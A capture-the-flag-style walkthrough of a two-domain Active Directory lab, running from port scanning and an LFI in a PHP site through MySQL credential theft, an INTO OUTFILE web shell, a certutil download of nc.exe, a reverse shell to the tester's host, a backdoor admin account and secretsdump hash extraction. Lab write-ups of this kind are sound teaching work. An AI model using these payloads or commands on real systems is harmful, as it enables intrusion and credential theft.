— Brief —
Trusted is a chain consists of 2 machines, it’s an active directory environment with 2 domains. There is a child domain and a parent domain.
This vulnerable lab environment expect us to get access a user inside of Enterprise Administrators group within Active Directory Directory Services.
Scope:
- 10.10.210.181
- 10.10.210.182
— Enumeration Phase —
First of all, we will be starting a point where we have just got IPv4 addresses. So, we start with port scanning. Scanning most used 1000 TCP ports.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $sudo nmap -Pn -n -sS -sV -sC 10.10.210.181-182 -oN default_scan.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 20:10 UTC
Nmap scan report for 10.10.210.181
Host is up (0.060s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 20:10:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T20:10:41+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-09-02T20:00:47
|_Not valid after: 2025-03-04T20:00:47
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-09-03T20:10:25+00:00
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-03T20:10:27
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Nmap scan report for 10.10.210.182
Host is up (0.060s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.210.182/dashboard/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 20:10:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.210.182/dashboard/
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 10
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, SupportsCompression, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 6?yfq&gTOpf/T;j'{]>[
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T20:10:41+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-09-03T20:10:25+00:00
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-09-02T20:00:51
|_Not valid after: 2025-03-04T20:00:51
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2024-09-03T20:10:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Post-scan script results:
| clock-skew:
| -1s:
| 10.10.210.181
|_ 10.10.210.182
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 35.98 seconds
According to Nmap Scan:
10.10.210.181
- Domain Controller (88/TCP is default Kerberos protocol)
- Remote Desktop Protocol (3389/TCP is default RDP port.)
- Domain Name: trusted.vl0 (From RDP service with nmap script scanning)
- Domain Controller FQDN: trusteddc.trusted.vl (From RDP service with nmap script scanning)
- Windows Operating System (From a bunch of services’ version outputs)
- SMB signing enabled and required. (No-need to check Relay Attacks)
10.10.210.182
- Domain Controller (88/TCP is default Kerberos protocol)
- Remote Desktop Protocol (3389/TCP is default RDP port.)
- Domain Name: lab.trusted.vl (From RDP service with nmap script scanning)
- Domain Controller FQDN: trusteddc.trusted.vl (From RDP service with nmap script scanning)
- Windows Operating System (From a bunch of services’ version outputs)
- SMB signing enabled and required. (No-need to check Relay Attacks)
- Web Server (80/TCP or 443/TCP is a sign of a web application) (XAMPP service packager.)
- MySQL Server (3306 is default port for MySQL or MariaDB services.)
Tip: XAMPP is a software that includes Apache, Mariadb, Filezilla and some other softwares. It is mostly found in Windows OS that should serve PHP web applications.
As we are security professional, we always should prioritize our attack surfaces. We need to give our best effort to our clients with the most possible attack vectors as our paid time is limited.
From this port scanning output, I see my prioritized attack surface in this order.
- Web Servers (80/TCP, 443/TCP)
- SMB Public Shares, Null Sessions.
- Kerberoastable Users.
- LDAP anonymous binding.
- Brute-force attacks. (SMB, MySQL. RDP brute-force is not recommended, because it may lock user accounts.)
- And plenty of other attack techniques.
I will start with web servers on the server ends with 182. Web servers are up-to-date and supports PHP. (Nmap script output and also you can verify that via checking HTTP headers.)
- Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
— Enumeration on Web Server —
When we try to access web server via this URL, we are redirected to /dashboard/ folder. That folder is a default installation page for XAMPP software.
http://10.10.210.182/ -> http://10.10.210.182/dashboard/Tip: XAMPP software’s web application includes a PHPINFO page and PhpMyAdmin application.
Tip: PhpMyAdmin is a web application developed with PHP. It is a database management tool.
From phpinfo page, we can enumerate sensitive information.
http://10.10.210.182/dashboard/phpinfo.php
---
OS Build: Windows NT LABDC 10.0 build 20348 (Windows Server 2022) AMD64
OS Model and Version: Microsoft Windows Server 2019 Datacenter [10.0.17763]
MySQL Installation Directory: \xampp\mysql\bin
Webroot Path: C:/xampp/htdocs Phpmyadmin returns 403 page. It is a forbidden directory.
There is nothing to do much in this dashboard directory.
It’s time to check other directories exist on webroot path. This hidden or not-linked to main page directory or file might expand our attack surface if there is. We try a brute-force attack to discover directories and files within web server.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $ffuf -u http://10.10.210.182/FUZZ -w ~/Desktop/tools/raft-large-dir.txt -mc all -fc 404,403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.210.182/FUZZ
:: Wordlist : FUZZ: /home/user/Desktop/tools/raft-large-dir.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 404,403
________________________________________________
img [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 53ms]
dev [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
dashboard [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 60ms]
IMG [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 55ms]
examples [Status: 503, Size: 402, Words: 34, Lines: 12, Duration: 2061ms]
Img [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
DEV [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
Dev [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 53ms]
xampp [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 52ms]
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 64ms]
Dashboard [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 53ms]
Webalizer [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 79ms]
WEBALIZER [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 54ms]
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 60ms]
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 58ms]
:: Progress: [62284/62284] :: Job [1/1] :: 701 req/sec :: Duration: [0:01:36] :: Errors: 2 ::According to direcotry fuzzing output,
- There are 6 directories.
- /dev/ -> Custom directory in web server.
- /xampp/, /webalizer/, /img/, /dashboard/, /examples/ -> Default directories for Apache servers that served with XAMPP software.
Tip: Windows filesystem is case insensitive. So “/Dashboard” and “/dashboard” represents the same directory.
As security professionals, we should check /dev/ directory.
Tip: Mostly dev, development, beta and staging named subdomains, directories or digital assets are not hardened assets. So they might consists juicy attack vectors for threat actors.
So, it’s a web application for a law firm. We need to expand our attack surface more and more. So we will check other web pages that linked to main page in header section as menu. 🙂
Once we clicked to “ABOUT” link, we are redirected to this URL:
http://10.10.210.182/dev/index.html?view=about.htmlThat is a very interesting URL, because it refers a HTML file but gets input. This input stores a filename.
Sooo, let’s get to IT basics.
- HTML is a markup language.
- It’s not executed on Server-Side. (Web-servers such as Apache, IIS)
- It’s rendered on Client-Side. (Web-browsers such as Chrome, Firefox)
- Mostly, all HTML static files are sends as it is to client-users by web servers.
For that reasons, there is no need to use query strings on HTML files. (But there might be javascript codes on HTML files that uses query parameters within URL.)
The easiest way to explain this URL is to make an explanation to web-server configurations.
On vanilla PHP web applications, we might see .html extensions are executed on server-side with web server’s PHP module. So in above URL, there might be a htaccess file that rules html extensions must be executed on Apache’s PHP module.
Tip: PHP web applications served Apache might stores htaccess files to configure web-server in a directory. This htaccess files directives Apache’s execution policy.
Our theory: This interesting URL show us HTML file extensions are executed Apache’s PHP module.
Let’s check our theory. How? Mostly, “.htaccess” files are used to configure apache and it is mostly found in webroot path.
Besides of this explanation, you can easily read “.htaccess” files with Path Traversal or Local File Inclusion vulnerability. Let’s check whether the view parameter is used in a include/require function or any file read function.
http://10.10.210.182/dev/index.html?view=0x5001
It seems “view” parameter is used in a include function. This is a critical phase to understand. This PHP error message is too detailed.
— Web Application Exploitation —
It’s a Local File Inclusion (LFI) vulnerability. Because “include” function executes PHP codes in a file if there is any PHP code in the file.
Tip: PHP codes starts with “<?php” or “<?=” tags.
Also, our input is not concatenated with a prefix directory. This allow us to use PHP wrappers. PHP wrappers expand our attack surface, such as reading a PHP file.
Tip: PHP wrappers are URL-style protocols for use with the filesystem functions.
Let’s back to our theory, we need to read “.htaccess” file to verify our theory.
http://10.10.210.182/dev/index.html?view=.htaccess
“AddType application/x-httpd-php .htm .html”
This rule directives why html extensions are executed on Apache’s PHP module.
Let’s focus to read other files. But what files? What files can they expand our attack surface more and more?
- Included files in index.php
- Sensitive files inside of webroot path.
- Custom web applications to find vulnerabilities from white-box perspective.
- Other applications’ configuration files.
- UNC paths to reveal NTLMv2 hash. (Because it is a Windows OS, we can try??)
Tip: index.php is served as main page by web-server when we are trying to access <directory>/ endpoint. (Default firstly “index.php” and secondly “index.html” by Apache)
Firstly, we can read “index.html” to find other included PHP files.
We cannot read index.html file contents with this URL:
http://10.10.210.182/dev/index.html?view=index.htmlWhy? Because “include” function used in index.html file executes PHP tags so we cannot read PHP codes inside of index.html file. It’s executed when included. We can use PHP filter wrapper to encode index.html file content with Base64 encoding.
PHP wrapper that encodes a file’s content to base64 encoded content
php://filter/convert.base64-encode/resource=<filename>Backend code might look like this:
include("php://filter/convert.base64-encode/resource=index.html")So our URL will be this:
http://10.10.210.182/dev/index.html?view=php://filter/convert.base64-encode/resource=index.html
Why we did not try Remote File Inclusion? Nice question to ask. On modern PHP configurations, it’s disabled to load external files in include/require functions by default.
We can check this configuration from phpinfo page we found earlier.
allow_url_include = Off
So, let’s jump to LFI exploitation.
We have gain access to index.php file content. We decode this base64 encoded content and redirect output to a file named “index.php” on my attacker machine.
echo "PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCj8+DQoNCjwhRE9DVFlQRSBIVE1MPg0KPCEtLSBXZWJzaXRlIHRlbXBsYXRlIGJ5IGZyZWV3ZWJzaXRldGVtcGxhdGVzLmNvbSAtLT4NCjxodG1sPg0KPGhlYWQ+DQoJPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KCTx0aXRsZT5MYXcgRmlybTwvdGl0bGU+DQoJPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3Mvc3R5bGUuY3NzIiB0eXBlPSJ0ZXh0L2NzcyI+DQo8L2hlYWQ+DQo8Ym9keT4NCgk8ZGl2IGlkPSJoZWFkZXIiPg0KCQk8ZGl2IGNsYXNzPSJjbGVhcmZpeCI+DQoJCQk8ZGl2IGNsYXNzPSJsb2dvIj4NCgkJCQk8YSBocmVmPSJpbmRleC5odG1sP3ZpZXc9aW5kZXguaHRtbCI+PGltZyBzcmM9ImltYWdlcy9sb2dvLnBuZyIgYWx0PSJMT0dPIiBoZWlnaHQ9IjUyIiB3aWR0aD0iMzYyIj48L2E+DQoJCQk8L2Rpdj4NCgkJCTx1bCBjbGFzcz0ibmF2aWdhdGlvbiI+DQoJCQkJPGxpIGNsYXNzPSJhY3RpdmUiPg0KCQkJCQk8YSBocmVmPSJpbmRleC5odG1sP3ZpZXc9aW5kZXguaHRtbCI+SG9tZTwvYT4NCgkJCQk8L2xpPg0KCQkJCTxsaT4NCgkJCQkJPGEgaHJlZj0iaW5kZXguaHRtbD92aWV3PWFib3V0Lmh0bWwiPkFib3V0PC9hPg0KCQkJCTwvbGk+DQoJCQkJPC9saT4NCgkJCQk8bGk+DQoJCQkJCTxhIGhyZWY9ImluZGV4Lmh0bWw/dmlldz1jb250YWN0Lmh0bWwiPkNvbnRhY3Q8L2E+DQoJCQkJPC9saT4NCgkJCTwvdWw+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KPD9waHANCg0KaWYoIWlzc2V0KCRfR0VUWyd2aWV3J10pIHx8ICgkX0dFVFsndmlldyddPT0iaW5kZXguaHRtbCIpKSB7DQogICAkY29udGVudCA9IDw8PEVPRA0KDQoJPGRpdiBpZD0iY29udGVudHMiPg0KCQk8ZGl2IGlkPSJhZGJveCI+DQoJCQk8ZGl2IGNsYXNzPSJjbGVhcmZpeCI+DQoJCQkJPGltZyBzcmM9ImltYWdlcy9mYW1pbHktbGFyZ2UuanBnIiBhbHQ9IkltZyIgaGVpZ2h0PSIzODIiIHdpZHRoPSI1OTQiPg0KCQkJCTxkaXYgY2xhc3M9ImRldGFpbCI+DQoJCQkJCTxoMT5JdOKAmXMgbmV2ZXIgZWFzeS4uLjxicj4gV2hlbiBpdCBjb21lcyB0byBmYW1pbHkuPC9oMT4NCgkJCQkJPHA+DQoJCQkJCQlCdXQgd2UgY2FuIHNldDxicj4gZXZlcnl0aGluZyBzdHJhaWdodC4NCgkJCQkJPC9wPg0KCQkJCTwvZGl2Pg0KCQkJPC9kaXY+DQoJCTwvZGl2Pg0KCQk8ZGl2IGNsYXNzPSJoaWdobGlnaHQiPg0KCQkJPGRpdiBjbGFzcz0iY2xlYXJmaXgiPg0KCQkJCTxkaXYgY2xhc3M9InRlc3RpbW9uaWFsIj4NCgkJCQkJPGgyPlRlc3RpbW9uaWFsczwvaDI+DQoJCQkJCTxwPg0KCQkJCQkJSSByYW5zb213YXJlZCBjb3VudGxlc3MgY29tcGFuaWVzIGFuZCBNYW5lcyBXaW5jaGVzdGVyIGhlbHBlZCBtZSB0byBnZXQgYXdheSB3aXRoIGl0IQ0KCQkJCQk8L3A+DQoJCQkJCTxzcGFuPkphY2s8L3NwYW4+DQoJCQkJPC9kaXY+DQoJCQkJPGgxPlRoZSBNYW5lcyBXaW5jaGVzdGVyIFByb21pc2U8L2gxPg0KCQkJCTxwPg0KCQkJCQlXZSBhcmUgdGhlIGJlc3QgbGF3IGZpcm0gaW4gdGhlIFVTIC0gdHJ1c3QgdXMhDQoJCQkJPC9wPg0KCQkJPC9kaXY+DQoJCTwvZGl2PgkJDQoJPC9kaXY+DQoJPGRpdiBpZD0iZm9vdGVyIj4NCgkJPGRpdiBjbGFzcz0iY2xlYXJmaXgiPg0KCQkJPGRpdiBjbGFzcz0ic2VjdGlvbiI+DQoJCQkJPGg0PkxhdGVzdCBOZXdzPC9oND4NCgkJCQk8cD4NCgkJCQkJRXJpYyBwbGVhc2UgdGFrZSBhIGxvb2sgYXQgdGhpcyBpZiB5b3UgaGF2ZSB0aGUgdGltZS4gSSB0cmllZCB0byBpbXBsZW1lbnQgc29tZSBwaHAgY29kZSBhbmQgc2V0IHVwIHRoZSBkYXRhYmFzZSBjb25uZWN0aW9uIGJ1dCBpdCBkb2Vzbid0IHNlZW0gdG8gd29yay4gQ291bGQgeW91IGZpeCBpdCBwbGVhc2U/DQoJCQkJPC9wPg0KCQkJPC9kaXY+DQoJCQ0KCQk8L2Rpdj4NCgkJPGRpdiBpZD0iZm9vdG5vdGUiPg0KCQkJPGRpdiBjbGFzcz0iY2xlYXJmaXgiPg0KCQkJCTxkaXYgY2xhc3M9ImNvbm5lY3QiPg0KCQkJCQk8YSBocmVmPSJodHRwOi8vZnJlZXdlYnNpdGV0ZW1wbGF0ZXMuY29tL2dvL2ZhY2Vib29rLyIgY2xhc3M9ImZhY2Vib29rIj48L2E+PGEgaHJlZj0iaHR0cDovL2ZyZWV3ZWJzaXRldGVtcGxhdGVzLmNvbS9nby90d2l0dGVyLyIgY2xhc3M9InR3aXR0ZXIiPjwvYT48YSBocmVmPSJodHRwOi8vZnJlZXdlYnNpdGV0ZW1wbGF0ZXMuY29tL2dvL2dvb2dsZXBsdXMvIiBjbGFzcz0iZ29vZ2xlcGx1cyI+PC9hPjxhIGhyZWY9Imh0dHA6Ly9waW50ZXJlc3QuY29tL2Z3dGVtcGxhdGVzLyIgY2xhc3M9InBpbnRlcmVzdCI+PC9hPg0KCQkJCTwvZGl2Pg0KCQkJCTxwPg0KCQkJCQnCqSBDb3B5cmlnaHQgMjAyMyBNYW5lcyBXaW5jaGVzdGVyLiBBbGwgUmlnaHRzIFJlc2VydmVkLg0KCQkJCTwvcD4NCgkJCTwvZGl2Pg0KCQk8L2Rpdj4NCgk8L2Rpdj4NCkVPRDsNCmVjaG8gJGNvbnRlbnQ7DQp9DQplbHNlIHsNCgkJZWNobyI8cD4iOw0KCQlpbmNsdWRlKCRfR0VUWyd2aWV3J10pOw0KCQllY2hvICI8L3A+IjsNCn0NCj8+DQo8L2JvZHk+DQo8L2h0bWw+" | base64 -d > index.phpOnce we analyzed index.php file, we will see no-other files are there to include. So, we should expand our attack surface with other files.
Tip: Mostly PHP files store other included files in first lines as PHP compiler reads codes from top to bottom. So any configuration or other function files must be in first-lines to execute.
So, our first attack vector did not expand our attack surface. (Included files in index.php)
Let’s focus second attack vector, directory and file fuzzing. If we can find any other custom application we can access, we can gain codes and find vulnerabilities in code.
We should scan directories and files in “/dev/” directory. Because this technique can reveal other files or directories. Because we can read file contents, we can easily find vulnerabilities in codes or gain access to sensitive configurations such as database connection URIs and more.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $ffuf -u http://10.10.210.182/dev/FUZZ -w ~/Desktop/tools/raft-large-files.txt -mc all -fc 404,403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.210.182/dev/FUZZ
:: Wordlist : FUZZ: /home/user/Desktop/tools/raft-large-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 404,403
________________________________________________
index.html [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 65ms]
contact.html [Status: 200, Size: 1967, Words: 84, Lines: 75, Duration: 58ms]
. [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 58ms]
about.html [Status: 200, Size: 1177, Words: 56, Lines: 41, Duration: 56ms]
db.php [Status: 200, Size: 22, Words: 2, Lines: 1, Duration: 72ms]
Contact.html [Status: 200, Size: 1967, Words: 84, Lines: 75, Duration: 72ms]
Index.html [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 58ms]
About.html [Status: 200, Size: 1177, Words: 56, Lines: 41, Duration: 54ms]
DB.php [Status: 200, Size: 22, Words: 2, Lines: 1, Duration: 55ms]
:: Progress: [37050/37050] :: Job [1/1] :: 735 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
From file fuzzing output, we found a PHP file named “db.php”.
Tip: db.php, config.php, configuration.php files might be located in “include” or “inc” directory, also they always stores sensitive juicy configuration fields.
Let’s read the file’s content.
http://10.10.210.182/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $echo 'PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=' | base64 -d
<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";
$conn = mysqli_connect($servername, $username, $password);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
We have got a database connection credential. It’s a MySQL/MariaDB server credential.
Credentials:
Username: root
Password: SuperSecureMySQLPassw0rd1337.
Servername: localhost
Database: ?Hmm, we have got a database credential. What should we do? If you remember, we have an open port for MySQL service.
Tip: MariaDB is a free fork of MySQL software.
— Database Connection —
Because we have a credential, we can use this credential to connect to services that requires authentication such as MySQL, SMB, RDP.
Let’s start with MySQL service:
Tip: “root” user is a default privileged-user for MySQL servers.
We are free to use mysql-client software to connect to mariadb-server.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $mysql -h'10.10.210.182' -u'root' -p'SuperSecureMySQLPassw0rd1337.'
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.4.24-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| news |
| performance_schema |
| phpmyadmin |
| test |
+--------------------+
6 rows in set (0.081 sec)
Tip: Sometimes, we cannot connect to MySQL server from external point, that may happen when MySQL is configured to allow white-listed IP addresses for its own users.
Now, it is time to think what we should do at MySQL server.
- Read database contents to find more credentials
- Check MySQL configuration to create new files on filesystem.
- (We do not need to read files, because we always have read access in filesystem via Local File Inclusion vulnerability.)
I am going to try creating a new file on server’s filesystem.
(Do not forget: MySQL service and Apache service is installed on the same server.)
So, what happens if I create a new file on server?. Think about twice, what we got access now, an Apache server and a MySQL server. Once we created a PHP file on Apache’s webroot path via SQL queries, we can execute this PHP file from web-server by just trying to access the file via HTTP requests.
If you want to do process more difficult, You can create an HTML file containing PHP codes. Because HTML extension is already executed by PHP module from Apache server.
Our theory is to get RCE from a PHP file in webroot path.
What we need to verify our theory:
- Does related MySQL configuration support write access to all filesystem?
- What is webroot path?
Firstly, we check MySQL configuration to find the path where we can create files.
This configuration is named as “secure_file_priv”
MariaDB [(none)]> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.073 sec)There is a blank value, that does mean we have access to all paths within filesystem.
Now, we should create a file in webroot path. Webroot path was in PHPINFO page.
Also, we can use this query to redirect outputs to filesystem.
SELECT "Example String from 0x5001" INTO OUTFILE "<PATH>";Now, let’s chain all knowledge to a single SQL query to create a PHP file on webroot path.
PHP file name: “0x5001.php”
Webroot path: “C:/xampp/htdocs”
MariaDB [(none)]> SELECT "<?=shell_exec($_GET[0])?>" INTO OUTFILE "C:/xampp/htdocs/0x5001.php";
Query OK, 1 row affected (0.061 sec)We can access this URL to execute our newly-created PHP file.
I executed “whoami” command to see whether our tiny PHP script is functioning as expected.
http://10.10.194.166/0x5001.php?0=whoami
Wow, we have access to highly-privileged user. Because web-server is executed by highly-privileged process, our PHP script will be executed under this highly-privileged security context.
— Initial Access —
We can upload netcat.exe binary from our attacker machine to server. We can get reverse-shell executing nc.exe from the PHP script.
Tip: If there is any AV, we cannot use nc.exe because AV will be triggered.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $find / -name nc.exe 2>/dev/null
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-resources/binaries/nc.exe
┌─[✗]─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $cp /usr/share/windows-resources/binaries/nc.exe .
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
To transfer nc.exe from our attacker machine to the server, I deployed a web server on my attacker machine and this web-server has nc.exe binary in webroot path.
10.10.194.166/0x5001.php?0=certutil.exe -f -urlcache http://10.8.3.126:8000/nc.exe nc.exeWe can use built-in windows executables to download files from external resources.
It is time to execute nc.exe from PHP script and we finally get reverse shell.
http://10.10.194.166/0x5001.php?0=nc.exe -e powershell 10.8.3.126 4444┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $nc -lvnp 4444
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.194.166:56765.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\xampp\htdocs> whoami
whoami
nt authority\system
PS C:\xampp\htdocs> That’s awesome. We have got privileged access to
— Local User to Enterprise Admin User —
Let’s analyze a little bit of what we have got right now. We are in Domain Controller machine. We have a privileged user access. So, we can dump “ntds.dit” file. But firstly, we should create a user for persistence.
PS C:\xampp\htdocs> net user 0x5001 Sup3rPass1 /add
net user 0x5001 Sup3rPass1 /add
The command completed successfully.
PS C:\xampp\htdocs> net localgroup administrators 0x5001 /add
net localgroup administrators 0x5001 /add
The command completed successfully.Now, we will be able to connect to the server via RDP service.
Because the Domain Controller server is accessible from our attacker machine, We can use “impacket-secretsdump” to dump credentials from Windows OS.
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $impacket-secretsdump 0x5001:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\LABDC$:aes256-cts-hmac-sha1-96:66314ebc733a8e2c7ad1981df445e830b86708fa0f30b37d5fb5af648c74c7ed
